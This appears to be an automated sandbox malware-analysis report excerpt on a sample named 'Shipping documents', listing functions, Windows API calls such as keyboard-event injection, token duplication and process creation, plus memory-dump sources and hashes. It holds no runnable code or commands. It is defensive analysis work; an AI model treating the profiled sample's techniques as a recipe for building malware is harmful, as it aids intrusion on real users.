                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                                                          • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                          • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                                                                          • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                          Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                          Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                          • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                                          • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                                                                                                          • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                                          Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                          • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                                                          • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                                                                                                          • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                          Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 3031932315-0
                                                                                                          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                          Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                          • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                                                          • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                                                          • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                                                          Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wfsopen
                                                                                                          • String ID:
                                                                                                          • API String ID: 197181222-0
                                                                                                          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                          Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2962429428-0
                                                                                                          • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                          • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                          • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                          • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                          Function 03EB4EE4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 03EB4EF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3472027048-0
                                                                                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                          • Instruction ID: 29937e24dc63c829cc47804863c36b4b2156785cc6d85381f7da5050639b2ca7
                                                                                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                          • Instruction Fuzzy Hash: 47E0BF7494410DEFDB00DFA8D5496EE7BB4EF04301F1006A1FD05E7681DB309E548A62
                                                                                                          Function 03EB4EE8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 03EB4EF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3472027048-0
                                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                          • Instruction ID: f094241c748ab4de49506194e487d178b7984b54e8e604dd1d29630fbba778fa
                                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                          • Instruction Fuzzy Hash: 21E0E67494410DDFDB00DFB8D5496EE7BB4EF04301F1002A1FD01E2281D6309D508A72

                                                                                                          Non-executed Functions

                                                                                                          Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                          • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                          • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                          • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                          • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                          • SendMessageW.USER32 ref: 0047CA7F
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00C00CA8,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                          • ImageList_BeginDrag.COMCTL32(00C00CA8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                          • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                          • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                          • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                          • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                          • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                          • SendMessageW.USER32 ref: 0047CD12
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                          • SendMessageW.USER32 ref: 0047CD80
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                          • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                          • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                          • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                          • SendMessageW.USER32 ref: 0047CE93
                                                                                                          • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,01931B40,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                          • SendMessageW.USER32 ref: 0047CF6B
                                                                                                          • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,01931B40,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                          • String ID: @GUI_DRAGID$F
                                                                                                          • API String ID: 3100379633-4164748364
                                                                                                          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                          Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 00434420
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                          • IsIconic.USER32(?), ref: 0043444F
                                                                                                          • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                          • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 2889586943-2988720461
                                                                                                          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                          Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                          • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                          • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                          • _wcslen.LIBCMT ref: 00446498
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                          • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                          • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                          • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                          • String ID: $@OH$default$winsta0
                                                                                                          • API String ID: 3324942560-3791954436
                                                                                                          • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                                                          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                          • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                                                          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
